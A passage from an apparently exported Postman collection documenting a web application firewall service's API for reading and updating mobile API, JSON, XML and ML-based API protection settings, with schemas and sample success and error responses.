\"/test1\",\n                \"name\": 0\n            },\n            {\n                \"url-pattern\": \"/test2\",\n                \"name\": 1\n            },\n            {\n                \"url-pattern\": \"/t3\",\n                \"name\": 2\n            },\n            {\n                \"url-pattern\": \"/t4\",\n                \"name\": 3\n            },\n            {\n                \"url-pattern\": \"/t5\",\n                \"name\": 4\n            },\n            {\n                \"url-pattern\": \"/t6\",\n                \"name\": 5\n            },\n            {\n                \"url-pattern\": \"/t7\",\n                \"name\": 6\n            },\n            {\n                \"url-pattern\": \"/t8\",\n                \"name\": 7\n            },\n            {\n                \"url-pattern\": \"/t9\",\n                \"name\": 8\n            },\n            {\n                \"url-pattern\": \"/t10\",\n                \"name\": 9\n            },\n            {\n                \"url-pattern\": \"/t11\",\n                \"name\": 10\n            },\n            {\n                \"url-pattern\": \"/t12\",\n                \"name\": 11\n            }\n        ],\n        \"action\": \"alert_deny\",\n        \"template_status\": \"disable\"\n    }\n}"}],"_postman_id":"52112ecf-9259-41ae-a518-4b273965b1a4"},{"name":"Update Mobile API Protection","id":"b1a5e384-7233-4264-a030-2d1c679df121","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n\t\"_status\":\"enable\",\n\t\"token-secret\":\"test\",\n\t\"token-header\":\"Jwt-Token\",\n\t\"url-list\":[\n\t\t{\"url-pattern\":\"/test\",\"name\":1}\n\t],\n\t\"action\": \"alert_deny\",\n\t\"template_status\":\"disable\"\n}","options":{"raw":{"language":"json"}}},"url":"https://api.tim.waasonline.com/v1/application/:ep_id/mobileapiprotection","description":"<p>Update the configuration information about mobile API protection.</p>\n<p>A body including all parameters and values in the request that conforms to the following JSON schema:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">\n{\n    \"type\": \"object\",\n    \"properties\": {\n        \"_status\": {\n            \"description\": \"Configure to enable or disable mobile API protection\",\n            \"type\": \"string\",\n            \"enum\": [\n                \"enable\",\n                \"disable\"\n            ],\n            \"default\": \"disable\"\n        },\n        \"action\": {\n            \"description\": \"Select which action TIM Host Protection will take when it detects a violation of the rule.\",\n            \"type\": \"string\",\n            \"enum\": [\n                \"alert\",\n                \"alert_deny\",\n                \"deny_no_log\"\n            ],\n            \"default\": \"alert_deny\"\n        },\n        \"template_status\": {\n            \"description\": \"Configure to enable or disable the module's template status\",\n            \"type\": \"string\",\n            \"enum\": [\n                \"enable\",\n                \"disable\"\n            ],\n            \"default\": \"disable\"\n        },\n        \"token-header\": {\n            \"description\": \"Indicate the header that carries the JWT-token in the request\",\n            \"type\": \"string\",\n            \"default\": \"Jwt-Token\"\n        },\n        \"token-secret\": {\n            \"description\": \"Enter the JWT-token secret that you get from the Approov platform\",\n            \"type\": \"string\",\n        },\n        \"url-list\": {\n            \"description\": \"The request URL list\",\n            \"type\": \"array\",\n            \"required\": [\"_status\", \"token-secret\", \"action\"],\n            \"maxItems\": 12,\n            \"uniqueItems\": true,\n            \"items\": {\n                \"type\": \"object\",\n                \"required\": [\"name\"],\n                \"properties\": {\n                    \"name\": {\n                        \"description\": \"The sequence number of the request URL\",\n                        \"type\": \"integer\"\n                    },\n                    \"url-pattern\": {\n                        \"description\": \"The request URL\",\n                        \"type\": \"string\"\n                    }\n                }\n            }\n        }\n        \n    }\n}\n\n</code></pre>\n<p>After you update the configuration, the API will return successfully.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","mobileapiprotection"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"2f349fe1-003c-496c-9794-5babcbebf0c8","name":"Success","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"},{"key":"","value":"","type":"text","disabled":true}],"body":{"mode":"raw","raw":"{\n\t\"_status\":\"enable\",\n\t\"token-secret\":\"test\",\n\t\"token-header\":\"Jwt-Token\",\n\t\"url-list\":[\n\t\t{\"url-pattern\":\"/test\",\"name\":1}\n\t],\n\t\"action\": \"alert_deny\",\n\t\"template_status\":\"disable\"\n}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/mobileapiprotection","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","mobileapiprotection"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The application ID, it can be obtained from List Applications API."}]}},"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\"\n}"},{"id":"fa49a3b6-ac9a-40da-8fc1-c58e547810d2","name":"Fail","originalRequest":{"method":"PUT","header":[{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","type":"text","value":"application/json"},{"key":"","type":"text","value":"","disabled":true}],"body":{"mode":"raw","raw":"{\n\t\"_status\":\"enable\",\n\t\"token-secret\":\"test\",\n\t\"token-header\":\"Jwt-Token\",\n\t\"url-list\":[\n\t\t{\"url-pattern\":\"/test\",\"name\":1}\n\t],\n\t\"template_status\":\"disable\"\n}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/mobileapiprotection","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","mobileapiprotection"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The application ID, it can be obtained from List Applications API."}]}},"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\r\n    \"detail\": \"Check failed: {'action': 'must be contained'}\"\r\n}"}],"_postman_id":"b1a5e384-7233-4264-a030-2d1c679df121"},{"name":"Get JSON Protection","id":"73c35acd-36f0-425f-b6d0-98cbf9304ad7","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Accept","type":"text","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"url":"https://api.tim.waasonline.com/v1/application/:ep_id/jsonprotection","description":"<p>Get the configuration information of JSON protection.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","jsonprotection"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"d650a630-4e20-4a42-ab60-ed324691c49c","name":"Success","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json","type":"text"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/jsonprotection","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","jsonprotection"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The application ID, it can be obtained from List Applications API."}]}},"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\",\n    \"result\": {\n        \"_status\": \"enable\",\n        \"action\": \"alert_deny\",\n        \"jsonsecuritypolicy\": {\n            \"input-rule-list\": [\n                {\n                    \"seq\": \"1\",\n                    \"url\": \"/test\",\n                    \"json-limits\": \"enable\",\n                    \"schema-file\": \"112.json\",\n                    \"name\": \"test1\",\n                    \"#md5_value\": \"aa70c7dd4b30d2e028ca1447071d7e64\",\n                    \"schema_valid\": \"enable\"\n                }\n            ]\n        },\n        \"template_status\": \"disable\"\n    }\n}"}],"_postman_id":"73c35acd-36f0-425f-b6d0-98cbf9304ad7"},{"name":"Update JSON Protection","id":"d94e38e4-8322-4e5f-9bbe-fbe6f4e52473","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Accept","type":"text","value":"application/json"}],"body":{"mode":"formdata","formdata":[{"key":"_status","value":"enable","type":"text"},{"key":"jsonsecuritypolicy","value":"{\"input-rule-list\":[{\"name\":\"rule-1\",\"url\":\"/test\",\"schema_valid\":\"enable\",\"schema-file\":\"112.json\",\"json-limits\":\"enable\",\"seq\":1}]}","type":"text"},{"key":"template_status","value":"disable","type":"text"},{"key":"file_rule-1","value":"C:\\WAF\\JSON files\\123.json","description":"<p>This is the .json file to upload.</p>\n","type":"text"}]},"url":"https://api.tim.waasonline.com/v1/application/:ep_id/jsonprotection","description":"\n\n\n<p>Update the information about the JSON protection.</p>\n<p>The data format in the request is <code>multipart/form-data</code>. </p>\n<p>The keys of the form are <code>_status, jsonsecuritypolicy, template_status, action.</code></p>\n<p>The keyword format of the uploaded file is: the prefix file+the sequence value of each rule, for example, file_2.</p>\n<p>The field _status value shall conform to the following JSON schema:\n\n</p><pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">\n    \"type\": \"string\",\n    \"enum\": [\"enable\", \"disable\"],\n    \"default\": \"disable\"\n\n</code></pre>\n<p></p>\n<p>The field action value shall conform to the following JSON schema:\n\n</p><pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">\n    \"type\": \"string\",\n    \"enum\": [\"alert\", \"alert_deny\", \"deny_no_log\"],\n    \"default\": \"alert_deny\"\n\n</code></pre>\n<p></p>\n<p>The field template_status value shall conform to the following JSON schema:\n\n</p><pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">\n    \"type\": \"string\",\n    \"enum\": [\"enable\", \"disable\"],\n    \"default\": \"disable\"\n\n</code></pre>\n<p></p>\n<p>The field jsonsecuritypolicy value shall conform to the following JSON schema:\n\n</p><pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\"> \"type\": \"object\",\n    \"required\": [\"input-rule-list\"],\n    \"properties\": {\n        \"input-rule-list\": {\n            \"description\": \"The table list of the rule files\",\n            \"type\": \"array\",\n            \"maxItems\": 10,\n            \"uniqueItems\": true,\n            \"items\": {\n                \"type\": \"object\",\n                \"required\": [\"seq\"],\n                \"properties\": {\n                    \"name\": {\n                        \"description\": \"The sequence number of the API protection rule\",\n                        \"type\": \"integer\"\n                    },\n                    \"url\": {\n                        \"description\": \"The request URL\",\n                        \"type\": \"string\"\n                    },\n                    \"schema_valid\": {\n                        \"description\": \"Configure to enable or disable to select a schema file\",\n                        \"type\": \"string\",\n                        \"enum\": [\n                            \"enable\",\n                            \"disable\"\n                        ],\n                        \"default\": \"disable\"\n                    },\n                    \"schema-file\": {\n                        \"description\": \"The uploaded JSON file\",\n                        \"type\": \"string\"\n                    },\n                    \"json-limits\": {\n                        \"description\": \"Configure to enable or disable to define limits\",\n                        \"type\": \"string\",\n                        \"enum\": [\n                            \"enable\",\n                            \"disable\"\n                        ],\n                        \"default\": \"disable\"\n                    },\n                    \"seq\": {\n                        \"description\": \"The sequence number\",\n                        \"type\": \"integer\"\n                    }\n                }\n            }\n        }\n    }\n</code></pre>\n<p></p>\n<p>After you update the configuration, the API will return successfully.</p>\n\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","jsonprotection"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"08282ef8-5f24-495a-b02d-0077bbb6c557","name":"Success","originalRequest":{"method":"PUT","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"},{"key":"Accept","value":"application/json","type":"text"}],"body":{"mode":"formdata","formdata":[{"key":"_status","value":"enable","type":"text"},{"key":"jsonsecuritypolicy","value":"{\"input-rule-list\":[{\"name\":\"rule-1\",\"url\":\"/test\",\"schema_valid\":\"enable\",\"schema-file\":\"112.json\",\"json-limits\":\"enable\",\"seq\":1}]}","type":"text"},{"key":"template_status","value":"disable","type":"text"},{"key":"file_rule-1","value":"C:\\WAF\\JSON files\\123.json","description":"This is the .json file to upload.","type":"text"},{"key":"action","value":"alert","type":"text"}]},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/jsonprotection","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","jsonprotection"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The application ID, it can be obtained from List Applications API."}]}},"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\"\n}"},{"id":"fa580492-2dd2-4e0e-b518-b03ea1ea5eee","name":"Fail","originalRequest":{"method":"PUT","header":[{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Accept","type":"text","value":"application/json"}],"body":{"mode":"formdata","formdata":[{"key":"_status","value":"enable","type":"text"},{"key":"jsonsecuritypolicy","value":"{\"input-rule-list\":[{\"name\":\"rule-1\",\"url\":\"/test\",\"schema_valid\":\"enable\",\"schema-file\":\"112.json\",\"json-limits\":\"enable\",\"seq\":1}]}","type":"text"},{"key":"template_status","value":"disable","type":"text"},{"key":"file_rule-1","value":"C:\\WAF\\JSON files\\123.json","description":"This is the .json file to upload.","type":"text"}]},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/jsonprotection","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","jsonprotection"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The application ID, it can be obtained from List Applications API."}]}},"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\r\n    \"detail\": \"Check failed: {'action': 'must be contained'}\"\r\n}"}],"_postman_id":"d94e38e4-8322-4e5f-9bbe-fbe6f4e52473"},{"name":"Get XML Protection","id":"381150b1-ee96-449d-b70f-a84a2f073e8b","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"url":"https://api.tim.waasonline.com/v1/application/:ep_id/xmlprotectionpolicy","description":"<p>Get the configuration information of XML protection.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","xmlprotectionpolicy"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"8121f1d0-5432-4188-9031-7f168ccb92cd","name":"Fail","originalRequest":{"method":"GET","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/XMLProtectionPolicy","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","XMLProtectionPolicy"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"Forbidden","code":403,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 20 May 2019 07:07:21 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"65"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"e96511e7-7acd-11e9-83f5-0bb6ecbdb2f6"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amzn-ErrorType","value":"AccessDeniedException"},{"key":"x-amz-apigw-id","value":"Z-HGeFjEoAMFUgQ="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"HTTP method, resources or permissions not supported\"\n}"},{"id":"86761e60-6ddd-415a-9789-1478a4314b46","name":"Success","originalRequest":{"method":"GET","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/XMLProtectionPolicy","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","XMLProtectionPolicy"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 20 May 2019 07:16:07 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"233"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"22f5e563-7acf-11e9-a7bf-51b0e9db0d2d"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"Z-IYqF6XoAMFjxQ="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5ce25437-a6ce3cdc0b385f28181e38f6;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\",\n    \"result\": {\n        \"_status\": \"enable\",\n        \"action\": \"alert_deny\",\n        \"template_status\": \"disable\",\n        \"XMLProtectionPolicy\": {\n            \"input-rule-list\": [\n                {\n                    \"seq\": \"1\",\n                    \"url\": \"/test\",\n                    \"schema-file\": \"schema2.xsd\",\n                    \"name\": \"rule1\",\n                    \"forbid_xml\": \"disable\",\n                    \"schema_valid\": \"enable\"\n                }\n            ]\n        }\n    }\n}"}],"_postman_id":"381150b1-ee96-449d-b70f-a84a2f073e8b"},{"name":"Update XML Protection","id":"fd97fefc-c449-4c61-8c9f-b9d89acc2782","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"description":"<p>Token</p>\n","key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"formdata","formdata":[{"key":"_status","value":"enable","type":"text"},{"key":"XMLProtectionPolicy","value":"{\"input-rule-list\": [{\"seq\": \"2\", \"url\": \"/teasdfg12315\", \"name\": \"xml_rule3\", \"forbid_xml\": \"enable\", \"schema-file\": \"schema.xml\", \"schema_valid\": \"enable\"}]}","type":"text"},{"key":"file_xml_rule3","value":"C:\\WAF\\XML files\\123.xsd","description":"<p>This is the .xsd file to upload.</p>\n","type":"text"},{"key":"action","value":"alert","type":"text"}]},"url":"https://api.tim.waasonline.com/v1/application/:ep_id/xmlprotectionpolicy","description":"\n\n\n<p>Update the information about the XML protection policy.</p>\n<p>The data format in the request is <code>multipart/form-data</code>.</p>\n<p>The keys of the form are<code>_status, template_status, XMLProtectionPolicy, action</code>.</p>\n<p>The keyword format of the uploaded file is: the prefix file+the name value of each rule, for example, file_2.</p>\n<p>The field _status value shall conform to the following JSON schema:\n\n</p><pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">\n    \"type\": \"string\",\n    \"enum\": [\"enable\", \"disable\"],\n    \"default\": \"disable\"\n\n</code></pre>\n<p></p>\n<p>The field action value shall conform to the following JSON schema:\n\n</p><pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">\n    \"type\": \"string\",\n    \"enum\": [\"alert\", \"alert_deny\", \"deny_no_log\"],\n    \"default\": \"alert_deny\"\n\n</code></pre>\n<p></p>\n<p>The field template_status value shall conform to the following JSON schema:\n\n</p><pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">\n    \"type\": \"string\",\n    \"enum\": [\"enable\", \"disable\"],\n    \"default\": \"disable\"\n\n</code></pre>\n<p></p>\n<p>The field XMLProtectionPolicy value shall conform to the following JSON schema. The field schema-file is required only when the schema_valid is enable; when the schema_valid is disable, the schema-file is optional.</p>\n\n\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\"> \"type\": \"object\",\n    \"required\": [\"input-rule-list\"],\n    \"properties\": {\n        \"input-rule-list\": {\n            \"description\": \"The XML protection rule list\",\n            \"type\": \"array\",\n            \"maxItems\": 10,\n            \"uniqueItems\": true,\n            \"items\": {\n                \"type\": \"object\",\n                \"required\": [\"seq\", \"name\", \"url\",\"schema-file\"],\n                \"properties\": {\n                    \"seq\": {\n                        \"description\": \"The sequence number of the XML protection rules\",\n                        \"type\": \"integer\"\n                    },\n                    \"url\": {\n                        \"description\": \"The literal URL of the web server, such as /index.php, that the HTTP request must contain in order to match the rule.string\",\n                        \"type\": \"string\",\n                        \"maxLength\": 255,\n                        \"pattern\": \"/.*\"\n                    },\n                    \"name\": {\n                        \"description\": \"The name of the XML protection rule\",\n                        \"type\": \"string\",\n                        \"maxLength\": 39\n                    },\n                    \"forbid_xml\": {\n                        \"description\": \"Protect against XXE attacks by forbidding references to external entities in the request\",\n                        \"type\": \"string\",\n                        \"enum\": [\"enable\", \"disable\"],\n                        \"default\": \"disable\"\n                    },\n                    \"schema_valid\": {\n                        \"description\": \"Configure to validate that access adheres to the schema structure\",\n                        \"type\": \"string\",\n                        \"enum\": [\"enable\", \"disable\"],\n                        \"default\": \"disable\"\n                    },\n                    \"schema-file\": {\n                        \"description\": \"The uploaded schema file\",\n                        \"type\": \"string\",\n                        \"maxLength\": 255\n                    }\n                }\n            }\n        }\n    }\n</code></pre>\n<p>After you update the configuration, the API will return successfully.</p>\n<blockquote>\n<p>Require <a href=\"#authentication\">Token</a> as <code>Authorization</code> request header.</p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","xmlprotectionpolicy"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"54453918-ea0e-41eb-8357-1f18f5ff634f","name":"Fail","originalRequest":{"method":"PUT","header":[{"description":"Token","key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"formdata","formdata":[{"key":"_status","value":"enable","type":"text"},{"key":"XMLProtectionPolicy","value":"{\"input-rule-list\": [{\"seq\": \"2\", \"url\": \"/teasdfg12315\", \"name\": \"xml_rule3\", \"forbid_xml\": \"enable\", \"schema-file\": \"schema.xml\", \"schema_valid\": \"enable\"}]}","type":"text"},{"key":"file_xml_rule3","value":"C:\\WAF\\XML files\\123.xsd","description":"This is the .xsd file to upload.","type":"text"},{"key":"action","value":"alert","type":"text"}]},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/XMLProtectionPolicy","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","XMLProtectionPolicy"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The application ID"}]}},"status":"Forbidden","code":403,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 21 May 2019 02:31:49 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"65"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"95eafe53-7b70-11e9-9df0-bf2e74ae9a1b"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amzn-ErrorType","value":"AccessDeniedException"},{"key":"x-amz-apigw-id","value":"aAxrVF6XIAMFrXQ="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"HTTP method, resources or permissions not supported\"\n}"},{"id":"999e7180-b42b-4db4-9648-40c09a019c6c","name":"Success","originalRequest":{"method":"PUT","header":[{"description":"Token","key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"formdata","formdata":[{"key":"_status","value":"enable","type":"text"},{"key":"XMLProtectionPolicy","value":"{\"input-rule-list\": [{\"seq\": \"2\", \"url\": \"/teasdfg12315\", \"name\": \"xml_rule3\", \"forbid_xml\": \"enable\", \"schema-file\": \"schema.xml\", \"schema_valid\": \"enable\"}]}","type":"text"},{"key":"file_xml_rule3","value":"C:\\WAF\\XML files\\123.xsd","description":"This is the .xsd file to upload.","type":"text"},{"key":"action","value":"alert","type":"text"}]},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/XMLProtectionPolicy","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","XMLProtectionPolicy"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"Endpoint ID"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 21 May 2019 02:36:41 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"26"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"4356226f-7b71-11e9-bf78-e7093f808c20"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"aAyYyG4aoAMF8AA="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5ce36438-d59d6f38f1597dd0eaff4a74;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\"\n}"},{"id":"f83d976c-5fef-4041-b24c-5cfe7c60e9ca","name":"Parameter Invalid","originalRequest":{"method":"PUT","header":[{"description":"Token","key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"formdata","formdata":[{"key":"_status","value":"enable","type":"text"},{"key":"XMLProtectionPolicy","value":"{\"input-rule-list\": [{\"seq\": \"2\", \"url\": \"teasdfg12315\", \"name\": \"xml_rule3\", \"forbid_xml\": \"enable\", \"schema-file\": \"schema.xml\", \"schema_valid\": \"enable\"}]}","type":"text"},{"key":"file_xml_rule3","value":"C:\\WAF\\XML files\\123.xsd","description":"This is the .xsd file to upload.","type":"text"},{"key":"action","value":"alert","type":"text"}]},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/XMLProtectionPolicy","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","XMLProtectionPolicy"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The application ID, it can be obtained from List Applications API."}]}},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 21 May 2019 02:37:52 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"69"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"6d9f2d89-7b71-11e9-918b-d1f25cae1878"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"aAyj4Ej5IAMF_OQ="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5ce3647f-8c3095f78ffc04b0a1ac1bc0;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"Check failed: {'url': 'teasdfg12315 must start with /'}\"\n}"}],"_postman_id":"fd97fefc-c449-4c61-8c9f-b9d89acc2782"},{"name":"Get ML Based API Protection","id":"13feed97-a24a-4187-87c2-d6cdc4a397ec","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Accept","type":"text","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"url":"https://api.tim.waasonline.com/v1/application/:ep_id/ml_apiprot","description":"<p>Get the configuration information of JSON protection.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","ml_apiprot"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"id":"71de2702-7de6-4a35-b0d7-7f2142a53122","description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"9ed7d8bc-464e-4e25-ba57-a9d77492b51d","name":"Success","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json","type":"text"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/ml_apiprot","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","ml_apiprot"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The application ID, it can be obtained from List Applications API."}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\",\n    \"result\": {\n        \"_status\": \"enable\",\n        \"action\": \"alert_deny\",\n        \"template_status\": \"disable\",\n        \"ip_list_type\": \"Block\",\n        \"source_ip_list\": [\n            {\n                \"idx\": 1,\n                \"ip\": \"1.1.1.1\"\n            },\n            {\n                \"idx\": 2,\n                \"ip\": \"3.3.3.1-3.3.3.100\"\n            }\n        ],\n        \"api_path_list\": [\n            {\n                \"idx\": 1,\n                \"type\": \"regular\",\n                \"pattern\": \"/autotest/.*\"\n            },\n            {\n                \"idx\": 2,\n                \"type\": \"plain\",\n                \"pattern\": \"/api\"\n            }\n        ]\n    }\n}"}],"_postman_id":"13feed97-a24a-4187-87c2-d6cdc4a397ec"},{"name":"Update ML Based API Protection","id":"4bec968e-c74d-4dc9-bb95-6586d146e5b5","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Accept","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\r\n    \"_status\": \"enable\",\r\n    \"action\": \"alert_deny\",\r\n    \"template_status\": \"disable\",\r\n    \"ip_list_type\": \"Block\",\r\n    \"source_ip_list\": [\r\n        {\r\n            \"idx\": 1,\r\n            \"ip\": \"1.1.1.1\"\r\n        },\r\n        {\r\n            \"idx\": 2,\r\n            \"ip\": \"3.3.3.1-3.3.3.100\"\r\n        }\r\n    ],\r\n    \"api_path_list\": [\r\n        {\r\n            